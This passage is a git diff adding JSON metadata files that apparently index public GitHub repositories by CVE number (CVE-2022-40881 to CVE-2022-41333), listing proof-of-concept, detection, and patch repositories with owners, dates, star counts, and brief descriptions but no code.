"yilin1203\/CVE-2022-40881", + "owner": { + "login": "yilin1203", + "id": 71480339, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71480339?v=4", + "html_url": "https:\/\/github.com\/yilin1203", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yilin1203\/CVE-2022-40881", + "description": null, + "fork": false, + "created_at": "2023-02-25T06:54:52Z", + "updated_at": "2023-02-27T01:21:09Z", + "pushed_at": "2023-02-25T07:31:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40916.json b/2022/CVE-2022-40916.json new file mode 100644 index 0000000000..7cc236ff77 --- /dev/null +++ b/2022/CVE-2022-40916.json @@ -0,0 +1,33 @@ +[ + { + "id": 537484841, + "name": "CVE-2022-40916", + "full_name": "whitej3rry\/CVE-2022-40916", + "owner": { + "login": "whitej3rry", + "id": 60222364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60222364?v=4", + "html_url": "https:\/\/github.com\/whitej3rry", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whitej3rry\/CVE-2022-40916", + "description": null, + "fork": false, + "created_at": "2022-09-16T14:07:35Z", + "updated_at": "2022-09-28T14:29:21Z", + "pushed_at": "2022-09-28T14:37:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4096.json b/2022/CVE-2022-4096.json new file mode 100644 index 0000000000..16ba0d577f --- /dev/null +++ b/2022/CVE-2022-4096.json @@ -0,0 +1,33 @@ +[ + { + "id": 640557970, + "name": "CVE-2022-4096", + "full_name": "aminetitrofine\/CVE-2022-4096", + "owner": { + "login": "aminetitrofine", + "id": 70074517, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70074517?v=4", + "html_url": "https:\/\/github.com\/aminetitrofine", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aminetitrofine\/CVE-2022-4096", + "description": "This experiment is destinated to demonstrate how the DNS rebinding attack works on an emulated IoT. In the setup, we have a simulated IoT device, which can be controlled through a web interface (this is typical for many IoT devices).", + "fork": false, + "created_at": "2023-05-14T13:47:05Z", + "updated_at": "2023-05-14T13:50:54Z", + "pushed_at": "2023-05-14T13:50:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41034.json b/2022/CVE-2022-41034.json new file mode 100644 index 0000000000..bcb25136dd --- /dev/null +++ b/2022/CVE-2022-41034.json @@ -0,0 +1,33 @@ +[ + { + "id": 637284460, + "name": "CVE-2022-41034", + "full_name": "andyhsu024\/CVE-2022-41034", + "owner": { + "login": "andyhsu024", + "id": 131547485, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131547485?v=4", + "html_url": "https:\/\/github.com\/andyhsu024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andyhsu024\/CVE-2022-41034", + "description": null, + "fork": false, + "created_at": "2023-05-07T04:30:30Z", + "updated_at": "2023-05-07T04:30:30Z", + "pushed_at": "2023-06-11T13:17:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41040.json b/2022/CVE-2022-41040.json new file mode 100644 index 0000000000..a017747f40 --- /dev/null +++ b/2022/CVE-2022-41040.json @@ -0,0 +1,293 @@ +[ + { + "id": 544397376, + "name": "CVE-2022-41040", + "full_name": "numanturle\/CVE-2022-41040", + "owner": { + "login": "numanturle", + "id": 7007951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7007951?v=4", + "html_url": "https:\/\/github.com\/numanturle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/numanturle\/CVE-2022-41040", + "description": "CVE-2022-41040 nuclei template", + "fork": false, + "created_at": "2022-10-02T11:26:57Z", + "updated_at": "2024-09-27T09:58:51Z", + "pushed_at": "2022-10-02T11:55:35Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 18, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 545047982, + "name": "CVE-2022-41040_Mitigation", + "full_name": "CentarisCyber\/CVE-2022-41040_Mitigation", + "owner": { + "login": "CentarisCyber", + "id": 113211493, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113211493?v=4", + "html_url": "https:\/\/github.com\/CentarisCyber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CentarisCyber\/CVE-2022-41040_Mitigation", + "description": null, + "fork": false, + "created_at": "2022-10-03T17:36:13Z", + "updated_at": "2022-10-04T03:51:53Z", + "pushed_at": "2022-10-11T16:06:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 545517784, + "name": "CVE-2022-41040", + "full_name": "r3dcl1ff\/CVE-2022-41040", + "owner": { + "login": "r3dcl1ff", + "id": 81900341, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81900341?v=4", + "html_url": "https:\/\/github.com\/r3dcl1ff", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r3dcl1ff\/CVE-2022-41040", + "description": "mitigation script for MS Exchange server vuln", + "fork": false, + "created_at": "2022-10-04T14:07:18Z", + "updated_at": "2024-11-01T09:27:08Z", + "pushed_at": "2022-10-04T14:08:30Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 546370723, + "name": "CVE-2022-41040", + "full_name": "d3duct1v\/CVE-2022-41040", + "owner": { + "login": "d3duct1v", + "id": 49488197, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49488197?v=4", + "html_url": "https:\/\/github.com\/d3duct1v", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d3duct1v\/CVE-2022-41040", + "description": "Code set relating to CVE-2022-41040", + "fork": false, + "created_at": "2022-10-06T01:20:32Z", + "updated_at": "2022-11-09T14:24:07Z", + "pushed_at": "2022-10-06T13:20:19Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 548444286, + "name": "CVE-2022-41040-POC", + "full_name": "kljunowsky\/CVE-2022-41040-POC", + "owner": { + "login": "kljunowsky", + "id": 104329412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104329412?v=4", + "html_url": "https:\/\/github.com\/kljunowsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kljunowsky\/CVE-2022-41040-POC", + "description": "CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server", + "fork": false, + "created_at": "2022-10-09T15:27:40Z", + "updated_at": "2024-12-12T06:41:31Z", + "pushed_at": "2023-01-21T01:57:59Z", + "stargazers_count": 88, + "watchers_count": 88, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bug-bounty", + "bugbounty", + "cve-2022-41040", + "exploit", + "hacking", + "microsoft", + "microsoft-exchange", + "poc", + "proof-of-concept", + "security", + "ssrf" + ], + "visibility": "public", + "forks": 13, + "watchers": 88, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 548579073, + "name": "proxynotshell-IOC-Checker", + "full_name": "rjsudlow\/proxynotshell-IOC-Checker", + "owner": { + "login": "rjsudlow", + "id": 36338317, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36338317?v=4", + "html_url": "https:\/\/github.com\/rjsudlow", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rjsudlow\/proxynotshell-IOC-Checker", + "description": "Script to check for IOC's created by ProxyNotShell (CVE-2022-41040 & CVE-2022-41082)", + "fork": false, + "created_at": "2022-10-09T21:15:00Z", + "updated_at": "2023-10-06T15:02:26Z", + "pushed_at": "2022-10-09T23:24:35Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 551574337, + "name": "CVE-2022-41040", + "full_name": "ITPATJIDR\/CVE-2022-41040", + "owner": { + "login": "ITPATJIDR", + "id": 111498483, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111498483?v=4", + "html_url": "https:\/\/github.com\/ITPATJIDR", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ITPATJIDR\/CVE-2022-41040", + "description": null, + "fork": false, + "created_at": "2022-10-14T17:01:17Z", + "updated_at": "2024-01-02T10:32:09Z", + "pushed_at": "2022-10-15T09:10:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 554575532, + "name": "CVE-2022-41040-metasploit-ProxyNotShell", + "full_name": "TaroballzChen\/CVE-2022-41040-metasploit-ProxyNotShell", + "owner": { + "login": "TaroballzChen", + "id": 27862593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27862593?v=4", + "html_url": "https:\/\/github.com\/TaroballzChen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TaroballzChen\/CVE-2022-41040-metasploit-ProxyNotShell", + "description": "the metasploit script(POC) about CVE-2022-41040. Microsoft Exchange are vulnerable to a server-side request forgery (SSRF) attack. An authenticated attacker can use the vulnerability to elevate privileges.", + "fork": false, + "created_at": "2022-10-20T03:11:03Z", + "updated_at": "2024-11-12T06:03:11Z", + "pushed_at": "2022-10-20T06:36:42Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 35, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 893042972, + "name": "CVE-2022-41040", + "full_name": "0-Gram\/CVE-2022-41040", + "owner": { + "login": "0-Gram", + "id": 108672046, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108672046?v=4", + "html_url": "https:\/\/github.com\/0-Gram", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0-Gram\/CVE-2022-41040", + "description": null, + "fork": false, + "created_at": "2024-11-23T11:39:18Z", + "updated_at": "2024-11-23T11:39:52Z", + "pushed_at": "2024-11-23T11:39:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41080.json b/2022/CVE-2022-41080.json new file mode 100644 index 0000000000..d11f83cea9 --- /dev/null +++ b/2022/CVE-2022-41080.json @@ -0,0 +1,33 @@ +[ + { + "id": 581681361, + "name": "CVE-2022-41080", + "full_name": "ohnonoyesyes\/CVE-2022-41080", + "owner": { + "login": "ohnonoyesyes", + "id": 93457304, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93457304?v=4", + "html_url": "https:\/\/github.com\/ohnonoyesyes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ohnonoyesyes\/CVE-2022-41080", + "description": null, + "fork": false, + "created_at": "2022-12-23T23:46:36Z", + "updated_at": "2022-12-27T09:52:04Z", + "pushed_at": "2022-12-23T23:55:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41082.json b/2022/CVE-2022-41082.json new file mode 100644 index 0000000000..5d6b16bb6f --- /dev/null +++ b/2022/CVE-2022-41082.json @@ -0,0 +1,261 @@ +[ + { + "id": 544009101, + "name": "nse-exchange", + "full_name": "Diverto\/nse-exchange", + "owner": { + "login": "Diverto", + "id": 11384089, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11384089?v=4", + "html_url": "https:\/\/github.com\/Diverto", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Diverto\/nse-exchange", + "description": "Nmap scripts to detect exchange 0-day (CVE-2022-41082) vulnerability", + "fork": false, + "created_at": "2022-10-01T11:53:14Z", + "updated_at": "2024-11-06T11:43:09Z", + "pushed_at": "2023-01-03T08:37:33Z", + "stargazers_count": 81, + "watchers_count": 81, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 81, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 565743514, + "name": "http-vuln-CVE-2022-41082", + "full_name": "notareaperbutDR34P3r\/http-vuln-CVE-2022-41082", + "owner": { + "login": "notareaperbutDR34P3r", + "id": 118025285, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118025285?v=4", + "html_url": "https:\/\/github.com\/notareaperbutDR34P3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/notareaperbutDR34P3r\/http-vuln-CVE-2022-41082", + "description": "Microsoft Exchange Server Remote Code Execution Vulnerability.", + "fork": false, + "created_at": "2022-11-14T08:31:16Z", + "updated_at": "2023-02-17T00:50:04Z", + "pushed_at": "2023-03-23T07:13:01Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 573162752, + "name": "CVE-2022-41082", + "full_name": "sikkertech\/CVE-2022-41082", + "owner": { + "login": "sikkertech", + "id": 74667436, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74667436?v=4", + "html_url": "https:\/\/github.com\/sikkertech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sikkertech\/CVE-2022-41082", + "description": "Exchange CVE '22", + "fork": false, + "created_at": "2022-12-01T20:48:53Z", + "updated_at": "2023-11-05T16:40:22Z", + "pushed_at": "2022-12-01T20:50:01Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 581104837, + "name": "OWASSRF-CVE-2022-41082-POC", + "full_name": "balki97\/OWASSRF-CVE-2022-41082-POC", + "owner": { + "login": "balki97", + "id": 37090035, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37090035?v=4", + "html_url": "https:\/\/github.com\/balki97", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/balki97\/OWASSRF-CVE-2022-41082-POC", + "description": "PoC for the CVE-2022-41080 , CVE-2022-41082 and CVE-2022-41076 Vulnerabilities Affecting Microsoft Exchange Servers", + "fork": false, + "created_at": "2022-12-22T09:35:26Z", + "updated_at": "2024-12-05T06:38:48Z", + "pushed_at": "2023-01-10T08:09:36Z", + "stargazers_count": 92, + "watchers_count": 92, + "has_discussions": false, + "forks_count": 33, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-41076", + "cve-2022-41080", + "cve-2022-41082", + "exchange-server", + "exploit", + "microsoft", + "vulnerability" + ], + "visibility": "public", + "forks": 33, + "watchers": 92, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 604424331, + "name": "CVE-2022-41082-POC", + "full_name": "bigherocenter\/CVE-2022-41082-POC", + "owner": { + "login": "bigherocenter", + "id": 117562871, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117562871?v=4", + "html_url": "https:\/\/github.com\/bigherocenter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigherocenter\/CVE-2022-41082-POC", + "description": null, + "fork": false, + "created_at": "2023-02-21T02:59:46Z", + "updated_at": "2023-02-21T03:00:00Z", + "pushed_at": "2023-02-21T02:59:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 617641356, + "name": "vuln-CVE-2022-41082", + "full_name": "notareaperbutDR34P3r\/vuln-CVE-2022-41082", + "owner": { + "login": "notareaperbutDR34P3r", + "id": 118025285, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118025285?v=4", + "html_url": "https:\/\/github.com\/notareaperbutDR34P3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/notareaperbutDR34P3r\/vuln-CVE-2022-41082", + "description": "https & http", + "fork": false, + "created_at": "2023-03-22T20:04:07Z", + "updated_at": "2023-03-22T20:11:03Z", + "pushed_at": "2023-03-22T20:10:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 686757637, + "name": "CVE-2022-41082", + "full_name": "SUPRAAA-1337\/CVE-2022-41082", + "owner": { + "login": "SUPRAAA-1337", + "id": 128395905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128395905?v=4", + "html_url": "https:\/\/github.com\/SUPRAAA-1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SUPRAAA-1337\/CVE-2022-41082", + "description": null, + "fork": false, + "created_at": "2023-09-03T20:55:20Z", + "updated_at": "2024-03-18T17:53:10Z", + "pushed_at": "2023-09-03T21:02:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 877906940, + "name": "CVE-2022-41082", + "full_name": "soltanali0\/CVE-2022-41082", + "owner": { + "login": "soltanali0", + "id": 87374678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87374678?v=4", + "html_url": "https:\/\/github.com\/soltanali0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/soltanali0\/CVE-2022-41082", + "description": "CVE-2022-41082-poc", + "fork": false, + "created_at": "2024-10-24T12:56:52Z", + "updated_at": "2024-10-24T15:39:08Z", + "pushed_at": "2024-10-24T15:39:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41099.json b/2022/CVE-2022-41099.json new file mode 100644 index 0000000000..9f76c8fca1 --- /dev/null +++ b/2022/CVE-2022-41099.json @@ -0,0 +1,157 @@ +[ + { + "id": 588734636, + "name": "UpdateWindowsRE-CVE-2022-41099", + "full_name": "halsey51013\/UpdateWindowsRE-CVE-2022-41099", + "owner": { + "login": "halsey51013", + "id": 30665665, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30665665?v=4", + "html_url": "https:\/\/github.com\/halsey51013", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/halsey51013\/UpdateWindowsRE-CVE-2022-41099", + "description": "Script to update Windows Recovery Environment to patch against CVE-2022-41099", + "fork": false, + "created_at": "2023-01-13T21:27:03Z", + "updated_at": "2023-03-28T22:30:38Z", + "pushed_at": "2023-01-20T10:31:58Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 20, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 589494963, + "name": "CVE-2022-41099-Fix", + "full_name": "o0MattE0o\/CVE-2022-41099-Fix", + "owner": { + "login": "o0MattE0o", + "id": 80461805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80461805?v=4", + "html_url": "https:\/\/github.com\/o0MattE0o", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/o0MattE0o\/CVE-2022-41099-Fix", + "description": "Update WINRE.WIM file to fix CVE-2022-41099", + "fork": false, + "created_at": "2023-01-16T08:57:29Z", + "updated_at": "2024-06-04T11:02:47Z", + "pushed_at": "2023-04-25T09:47:46Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 595717372, + "name": "WinRE-Patch", + "full_name": "g-gill24\/WinRE-Patch", + "owner": { + "login": "g-gill24", + "id": 18432629, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18432629?v=4", + "html_url": "https:\/\/github.com\/g-gill24", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g-gill24\/WinRE-Patch", + "description": "Patches CVE-2022-41099", + "fork": false, + "created_at": "2023-01-31T17:06:13Z", + "updated_at": "2023-01-31T17:07:16Z", + "pushed_at": "2023-01-31T17:07:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 627897478, + "name": "KB5025175-CVE-2022-41099", + "full_name": "dsn1321\/KB5025175-CVE-2022-41099", + "owner": { + "login": "dsn1321", + "id": 37174087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37174087?v=4", + "html_url": "https:\/\/github.com\/dsn1321", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dsn1321\/KB5025175-CVE-2022-41099", + "description": null, + "fork": false, + "created_at": "2023-04-14T12:48:39Z", + "updated_at": "2023-04-14T12:49:26Z", + "pushed_at": "2023-04-14T14:26:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 885313431, + "name": "PatchWinRE", + "full_name": "rhett-hislop\/PatchWinRE", + "owner": { + "login": "rhett-hislop", + "id": 48539263, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48539263?v=4", + "html_url": "https:\/\/github.com\/rhett-hislop", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rhett-hislop\/PatchWinRE", + "description": "Automate updating the Windows Recovery Environment (WinRE) on deployed devices to address the security vulnerabilities in CVE-2022-41099.", + "fork": false, + "created_at": "2024-11-08T10:50:26Z", + "updated_at": "2024-11-08T10:53:43Z", + "pushed_at": "2024-11-08T10:53:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41114.json b/2022/CVE-2022-41114.json new file mode 100644 index 0000000000..2299ced441 --- /dev/null +++ b/2022/CVE-2022-41114.json @@ -0,0 +1,33 @@ +[ + { + "id": 584184679, + "name": "CVE-2022-41114", + "full_name": "gmh5225\/CVE-2022-41114", + "owner": { + "login": "gmh5225", + "id": 13917777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4", + "html_url": "https:\/\/github.com\/gmh5225", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmh5225\/CVE-2022-41114", + "description": "Windows Bind Filter Driver Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-01-01T18:30:30Z", + "updated_at": "2023-02-20T12:35:54Z", + "pushed_at": "2022-12-28T09:34:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41218.json b/2022/CVE-2022-41218.json new file mode 100644 index 0000000000..5576d29460 --- /dev/null +++ b/2022/CVE-2022-41218.json @@ -0,0 +1,33 @@ +[ + { + "id": 544746835, + "name": "CVE-2022-41218", + "full_name": "Tobey123\/CVE-2022-41218", + "owner": { + "login": "Tobey123", + "id": 5292815, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5292815?v=4", + "html_url": "https:\/\/github.com\/Tobey123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tobey123\/CVE-2022-41218", + "description": "Vulnerability Details for CVE-2022-41218", + "fork": false, + "created_at": "2022-10-03T06:38:46Z", + "updated_at": "2022-09-30T16:44:36Z", + "pushed_at": "2022-10-01T12:01:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41220.json b/2022/CVE-2022-41220.json new file mode 100644 index 0000000000..3e4ae9e3a9 --- /dev/null +++ b/2022/CVE-2022-41220.json @@ -0,0 +1,33 @@ +[ + { + "id": 595840391, + "name": "CVE-2022-41220", + "full_name": "Halcy0nic\/CVE-2022-41220", + "owner": { + "login": "Halcy0nic", + "id": 42481692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4", + "html_url": "https:\/\/github.com\/Halcy0nic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Halcy0nic\/CVE-2022-41220", + "description": "Proof of concept for CVE-2022-41220", + "fork": false, + "created_at": "2023-01-31T23:05:31Z", + "updated_at": "2024-07-02T20:33:18Z", + "pushed_at": "2023-07-27T23:01:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41272.json b/2022/CVE-2022-41272.json new file mode 100644 index 0000000000..032c4ec30c --- /dev/null +++ b/2022/CVE-2022-41272.json @@ -0,0 +1,33 @@ +[ + { + "id": 577881083, + "name": "CVE-2022-41272", + "full_name": "redrays-io\/CVE-2022-41272", + "owner": { + "login": "redrays-io", + "id": 89958617, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89958617?v=4", + "html_url": "https:\/\/github.com\/redrays-io", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redrays-io\/CVE-2022-41272", + "description": "Improper access control in SAP NetWeaver Process Integration", + "fork": false, + "created_at": "2022-12-13T18:32:03Z", + "updated_at": "2023-01-12T06:55:56Z", + "pushed_at": "2022-12-13T18:38:57Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-41333.json b/2022/CVE-2022-41333.json new file mode 100644 index 0000000000..475e8bd452 --- /dev/null +++ b/2022/CVE-2022-41333.json @@ -0,0 +1,33 @@ +[ + { + "id": 612324416, + "name": "CVE-2022-41333", + "full_name": 